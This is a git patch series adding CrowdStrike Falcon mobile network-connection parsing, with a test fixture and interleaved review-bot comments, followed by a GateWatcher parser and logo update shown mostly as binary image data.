From d277112c70a09797ce463921a1a90e6d6b93a24f Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 30 Aug 2024 10:57:32 +0200 Subject: [PATCH 001/317] Fix: add mobile detection network connections
---
.../crowdstrike_falcon/_meta/fields.yml | 5 ++ .../crowdstrike_falcon/ingest/parser.yml | 34 ++++++++ .../mobile_detection_network_connections.json | 86 +++++++++++++++++++ 3 files changed, 125 insertions(+) create mode 100644 CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json
diff --git a/CrowdStrike/crowdstrike_falcon/_meta/fields.yml b/CrowdStrike/crowdstrike_falcon/_meta/fields.yml
index 06491b466..799e1982e 100644
--- a/CrowdStrike/crowdstrike_falcon/_meta/fields.yml
+++ b/CrowdStrike/crowdstrike_falcon/_meta/fields.yml
@@ -115,6 +115,11 @@ crowdstrike.ldap_search_query_attack:
name: crowdstrike.ldap_search_query_attack
type: keyword
+crowdstrike.mobile.network_connections:
+ description: Mobile network connections
+ name: crowdstrike.mobile.network_connections
+ type: array
+
crowdstrike.object_id:
description: The identifier of a vertex
name: crowdstrike.object_id
diff --git a/CrowdStrike/crowdstrike_falcon/ingest/parser.yml b/CrowdStrike/crowdstrike_falcon/ingest/parser.yml
index ae0fbf23a..f739a0b70 100644
--- a/CrowdStrike/crowdstrike_falcon/ingest/parser.yml
+++ b/CrowdStrike/crowdstrike_falcon/ingest/parser.yml
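Review bot: `description: Mobile network connections` says nothing about what each element of the new `crowdstrike.mobile.network_connections` array contains, so a rule author reading the field catalogue cannot tell that entries carry `timestamp`, `direction`, `flags`, `protocol`, `url`, `context.pid` and optional `source`/`destination` address and port, which is the shape the parser change in this same commit builds. A one-line description naming those keys, e.g. `description: Network connections attached to a mobile detection; each entry holds timestamp, direction, flags, protocol, url, context.pid and optional source/destination address and port`, would make the field self-explaining.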
@@ -559,6 +559,40 @@ stages:
file.name: "{{parsed_event.message.event.TargetFilename}}"
+ - set:
+ crowdstrike.mobile.network_connections: >
+ {%- set connections = [] -%}
+ {%- for item in parsed_event.message.event.MobileNetworkConnections -%}
+ {%- set connection = {} -%}
+ {%- set timestamp = item.get("AccessTimestamp") | to_rfc3339 -%}
+ {%- set direction = item.get("ConnectionDirection") | int -%}
+ {%- set flags = item.get("ConnectionFlags") | int -%}
+ {%- set context = {"pid":item.get("ContextProcessId")} -%}
+ {%- set is_ipv6 = item.get("IsIPV6") -%}
+ {%- set protocol = item.get("Protocol") | int -%}
+ {%- set url = item.get("Url") -%}
+ {%- set _ = connection.update({"timestamp":timestamp, "direction":direction, "flags":flags, "context":context, "is_ipv6":is_ipv6, "protocol":protocol, "url":url}) -%}
+ {%- if item.get("LocalAddress") not in [None, ""] -%}
+ {%- set source = {"address":item.get("LocalAddress")} -%}
+ {%- if item.get("LocalPort") not in [None, ""] -%}
+ {%- set _ = source.update({"port":item.get("LocalPort")}) -%}
+ {%- endif -%}
+ {%- set _ = connection.update({"source":source}) -%}
+ {%- endif -%}
+ {%- if item.get("RemoteAddress") not in [None, ""] -%}
+ {%- set destination = {"address":item.get("RemoteAddress")} -%}
+ {%- if item.get("RemotePort") not in [None, ""] -%}
+ {%- set _ = destination.update({"port":item.get("RemotePort")}) -%}
+ {%- endif -%}
+ {%- set _ = connection.update({"destination":destination}) -%}
+ {%- endif -%}
+ {%- set _ = connections.append(connection) -%}
+ {%- endfor -%}
+ {{connections}}
+ filter: "{{parsed_event.message.event.get('MobileNetworkConnections') != None}}"
+
+ #"{{parsed_event.message.event.MobileNetworkConnections}}"
+
xdr_detection_summary_event: actions: - set:
diff --git a/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json b/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json
new file mode 100644
index 000000000..04c212800
--- /dev/null
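Review bot: `{"pid":item.get("ContextProcessId")}` passes the process id through as a bare integer, and the fixture added in this same commit expects `17793441978049446000`, a value above the signed 64-bit range and far outside the 2^53 window that double-based JSON consumers represent exactly, so downstream storage or search can overflow or silently round it; emitting it as a string, `{%- set context = {"pid":item.get("ContextProcessId") | string} -%}`, keeps it exact (the fixture's expected `pid` would then become a string as well). The commented-out `#"{{parsed_event.message.event.MobileNetworkConnections}}"` line after the filter reads as leftover debugging and should be removed before merge. The `| int` filters on ConnectionDirection, ConnectionFlags and Protocol yield 0 when the field is absent (Jinja2's `int` filter falls back to its default on a failed conversion), which is indistinguishable from a genuine 0, and `| to_rfc3339` on a missing AccessTimestamp has no guard at all; gating these with `not in [None, ""]` the way the address fields already are would avoid fabricating values.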
+++ b/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json 
@@ -0,0 +1,86 @@
+{
+ "input": {
+ "message": "{\"metadata\":{\"customerIDString\":\"0123456789ABCDEFGHIJKLMNOPQRSTUV\",\"offset\":13896542,\"eventType\":\"MobileDetectionSummaryEvent\",\"eventCreationTime\":1722754343000,\"version\":\"1.0\"},\"event\":{\"SensorId\":\"85ae98xxxxxxd9a8f2\",\"MobileDetectionId\":2,\"ComputerName\":\"host\",\"UserName\":\"user.name@test.com\",\"ContextTimeStamp\":1722754273,\"DetectId\":\"0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|2\",\"DetectName\":\"CkbSensorDetectDomainHighUI\",\"DetectDescription\":\"A domain lookup matched a CrowdStrike Intelligence indicator that has previously been used in targeted attacks.\",\"Tactic\":\"Falcon Intel\",\"TacticId\":\"CSTA0008\",\"Technique\":\"Intelligence Indicator - Domain\",\"TechniqueId\":\"CST0023\",\"Objective\":\"Falcon Detection Method\",\"Severity\":70,\"FalconHostLink\":\"https://falcon.eu-1.crowdstrike.com/mobile/detections/0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|2?_cid=0123456789ABCDEFGHIJKLMNOPQRSTUV\",\"MobileNetworkConnections\":[{\"AccessTimestamp\":1722754273,\"Protocol\":\"6\",\"ConnectionFlags\":0,\"LocalAddress\":\"\",\"RemoteAddress\":\"1.2.3.4\",\"RemotePort\":1,\"ConnectionDirection\":0,\"Url\":\"https://crowdstrike.test.com/integration\",\"IsIPV6\":false,\"ContextProcessId\":17793441978049446000}],\"ApplicationName\":\".com.google.chrome.ios\",\"NetworkDetectionType\":\"prevented\",\"SourceVendors\":\"CrowdStrike\",\"SourceProducts\":\"Falcon for Mobile\",\"DataDomains\":\"Endpoint\",\"PatternId\":41124,\"CompositeId\":\"7da61e27e34f4b8394081896af72e2c7:ind:2250689c5d8e43ccad2f5a7b56bced5b:41124|2\",\"Name\":\"CkbSensorDetectDomainHighUI\",\"Description\":\"A domain lookup matched a CrowdStrike Intelligence indicator that has previously been used in targeted attacks.\"}}",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "CrowdStrike Falcon",
+ "dialect_uuid": "22f2afd2-c858-443d-8e06-7b335e439c29"
+ }
+ }
+ },
+ "expected": {
+
"message": "{\"metadata\":{\"customerIDString\":\"0123456789ABCDEFGHIJKLMNOPQRSTUV\",\"offset\":13896542,\"eventType\":\"MobileDetectionSummaryEvent\",\"eventCreationTime\":1722754343000,\"version\":\"1.0\"},\"event\":{\"SensorId\":\"85ae98xxxxxxd9a8f2\",\"MobileDetectionId\":2,\"ComputerName\":\"host\",\"UserName\":\"user.name@test.com\",\"ContextTimeStamp\":1722754273,\"DetectId\":\"0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|2\",\"DetectName\":\"CkbSensorDetectDomainHighUI\",\"DetectDescription\":\"A domain lookup matched a CrowdStrike Intelligence indicator that has previously been used in targeted attacks.\",\"Tactic\":\"Falcon Intel\",\"TacticId\":\"CSTA0008\",\"Technique\":\"Intelligence Indicator - Domain\",\"TechniqueId\":\"CST0023\",\"Objective\":\"Falcon Detection Method\",\"Severity\":70,\"FalconHostLink\":\"https://falcon.eu-1.crowdstrike.com/mobile/detections/0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|2?_cid=0123456789ABCDEFGHIJKLMNOPQRSTUV\",\"MobileNetworkConnections\":[{\"AccessTimestamp\":1722754273,\"Protocol\":\"6\",\"ConnectionFlags\":0,\"LocalAddress\":\"\",\"RemoteAddress\":\"1.2.3.4\",\"RemotePort\":1,\"ConnectionDirection\":0,\"Url\":\"https://crowdstrike.test.com/integration\",\"IsIPV6\":false,\"ContextProcessId\":17793441978049446000}],\"ApplicationName\":\".com.google.chrome.ios\",\"NetworkDetectionType\":\"prevented\",\"SourceVendors\":\"CrowdStrike\",\"SourceProducts\":\"Falcon for Mobile\",\"DataDomains\":\"Endpoint\",\"PatternId\":41124,\"CompositeId\":\"7da61e27e34f4b8394081896af72e2c7:ind:2250689c5d8e43ccad2f5a7b56bced5b:41124|2\",\"Name\":\"CkbSensorDetectDomainHighUI\",\"Description\":\"A domain lookup matched a CrowdStrike Intelligence indicator that has previously been used in targeted attacks.\"}}", + "event": { + "action": "prevented", + "category": [ + "intrusion_detection" + ], + "dataset": [ + "MobileDetection" + ], + "kind": "alert", + "severity": 70, + "type": "info", + "url": 
"https://falcon.eu-1.crowdstrike.com/mobile/detections/0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|2?_cid=0123456789ABCDEFGHIJKLMNOPQRSTUV" + }, + "@timestamp": "2024-08-04T06:52:23Z", + "agent": { + "id": "85ae98xxxxxxd9a8f2" + }, + "crowdstrike": { + "customer_id": "0123456789ABCDEFGHIJKLMNOPQRSTUV", + "detect_description": "A domain lookup matched a CrowdStrike Intelligence indicator that has previously been used in targeted attacks.", + "detect_id": "0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|2", + "detect_name": "CkbSensorDetectDomainHighUI", + "event_objective": "Falcon Detection Method", + "event_type": "MobileDetectionSummaryEvent", + "mobile": { + "network_connections": [ + { + "context": { + "pid": 17793441978049446000 + }, + "destination": { + "address": "1.2.3.4", + "port": 1 + }, + "direction": 0, + "flags": 0, + "is_ipv6": false, + "protocol": 6, + "timestamp": "2024-08-04T06:51:13.000000Z", + "url": "https://crowdstrike.test.com/integration" + } + ] + } + }, + "host": { + "name": "host" + }, + "network": { + "application": ".com.google.chrome.ios" + }, + "observer": { + "product": "Falcon for Mobile", + "vendor": "CrowdStrike" + }, + "related": { + "user": [ + "user.name@test.com" + ] + }, + "threat": { + "tactic": { + "id": "CSTA0008", + "name": "Falcon Intel" + }, + "technique": { + "id": "CST0023", + "name": "Intelligence Indicator - Domain" + } + }, + "user": { + "name": "user.name@test.com" + } + } +} \ No newline at end of file From ae55e2cfefbf20555a81902b7bf1b694706198a0 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Wed, 4 Sep 2024 15:24:48 +0200 Subject: [PATCH 002/317] Legacy parser & logo updated --- GateWatcher/aioniq/_meta/logo.png | Bin 44477 -> 20110 bytes .../aioniq/_meta/smart-descriptions.json | 106 +++---- GateWatcher/aioniq/ingest/parser.yml | 298 +++++++++++++----- 3 files changed, 264 insertions(+), 140 deletions(-) 
diff --git a/GateWatcher/aioniq/_meta/logo.png b/GateWatcher/aioniq/_meta/logo.png index ff83fbb4fbccfea650a144a9c1a98f96c0d19b9f..0961df25ca068c6ba4a6d563e52897caec9ac8a4 100644 GIT binary patch literal 20110 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 